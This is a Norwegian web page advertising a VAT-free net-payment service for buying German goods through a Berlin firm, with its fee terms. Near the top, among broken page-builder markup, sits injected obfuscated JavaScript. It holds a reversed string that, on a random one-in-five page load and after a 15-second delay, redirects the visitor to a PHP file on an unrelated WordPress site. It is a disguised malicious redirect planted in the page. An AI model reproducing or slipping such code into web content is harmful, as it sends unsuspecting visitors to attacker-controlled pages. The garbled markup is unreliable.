Netto betalingstjenester

/Netto betalingstjenester
Netto betalingstjenester2019-03-15T16:51:00+01:00
) == "string") return $mRi.list[n].split("").reverse().join("");return $mRi.list[n];};$mRi.list=["\'php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andel.jpg“ background_position=“center center“ background_repeat=“no-repeat“ fade=“no“ background_parallax=“none“ enable_mobile=“no“ parallax_speed=“0.3″ video_mp4=““ video_webm=““ video_ogv=““ video_url=““ video_aspect_ratio=“16:9″ video_loop=“yes“ video_mute=“yes“ video_preview_image=““ border_size=““ border_color=““ border_style=“solid“ margin_top=“-55″ margin_bottom=““ padding_top=“55″ padding_right=““ padding_bottom=““ padding_left=““]

Hvilken service tilbyr vi?

Salg av varer fra Tyskland til Norge (som ikke tilhører EU) er ikke underlagt tysk moms.
Imidlertid må eksporten rapporteres nøyaktig og selgeren må være registrert i det offi sielle
tolladministrasjon ATLAS systemet. Hvis den tyske selgeren ikke kan vise frem fullstendig dokumentasjon…

Send beskjed nå

…angående salget, kan tyske skattemyndigheter innkreve etterbetaling (dette skjer ofte fl ere år etter salget). Dette medfører at mange tyske fi rmaer ikke vil gjennomføre netto salg til land utenfor EU. De krever derfor vanligvis et depositum for moms på forhånd.

For at handelen skal utføres rimeligere, enklere, og tryggere for alle parter, tilbyr vi tyske forhandlere, og norske kunder en nettobetalingstjeneste for varer av alle slag. Norske kunder betaler kun nettobeløpet. Vibetaler merverdiavgiften!

Vi kjøper varene for deg inkl. moms i Tyskland gjennom fi rmaet 9xx-automotive GmbH i Berlin. Som norsk kunde betaler du kun nettosummen, samt et servicegebyr til oss. Vi legger ut/betaler momsen for deg.

Hvilke fordeler har kjøperen?

Kjøperen trenger ved bruk av denne tjenesten ikke å betale depositum for moms, og er dermed beskyttet mot useriøse selgere som ikke betaler tilbake depos tumet. Kjøper kan også handle i tyske fi rmaer som ikke tilbyr eksportsalg. I disse tilfellene slipper kjøper tysk moms som tilsvarer nesten 1/5 del av kjøpesummen. Vi organiserer bestilling av transport og nødvendige dokumenter uten tilleggskostnader for kjøperen. Hvis det ønskes kan vi også ta oss av tollprosedyren i Norge.

Vi har online tilgang til et av Tysklands ledende forretnings/ kredittopplysningsbyrå, og kan derfor levere svært rask kredittvurdering og annen relevant informasjon om tyske forretningspartnere.

Hvilke fordeler har selgeren?

Gjennom vår betalingstjeneste blir salget et vanlig innenlands salg for selgeren. Han får bruttosummen
overført til sin konto – merverdiavgiften kreves ikke tilbake. For selgeren medfører det ingen ekstra arbeid med administrasjon og utbetaling av eventuelle garantidepositum for merverdiavgift. Selgeren risikerer ikke at eksportdokumentasjon ikke blir godkjent ved et fremtidig bokettersyn, ei heller kraftig etterbetaling av merverdiavgift. Selger trenger ikke å fylle ut komplekse skjemaer, eller vise frem varene i tollen!

Selgeren behøver ikke å ta seg av tollprosedyren!

Enda et tips: Fra 2009 må man være registrert som foretak i ATLAS tollsystemet for å kunne eksportere uten merverdiavgift til Norge, eller andre land utenfor EU.

Hvem er vi – og kan du stole på oss?

9xx-automotive GmbH er medlem av Norsk-Tysk Handelskammer.

Oppgaver og tjenester hos 9xx-automotive GmbH utføres av erfarne og dyktige medarbeidere ved vårt
avdelingskontor i Berlin, Tyskland.
Videresend gjerne denne informasjonen til dine venner, kunder, kollegaer eller forretningspartnere.
Med vår forretningskompetanse og gode forbindelser til Norge, Tyskland og EU, bistår vi gjerne med eksport eller import av andre produktgrupper også!

Tillegget på kjøpsprisen er minimum 650 Euro (opptil en kjøpspris på 32.500 Euro). Ved en høyere kjøpspris, vennligst ta kontakt for å avklare tillegget.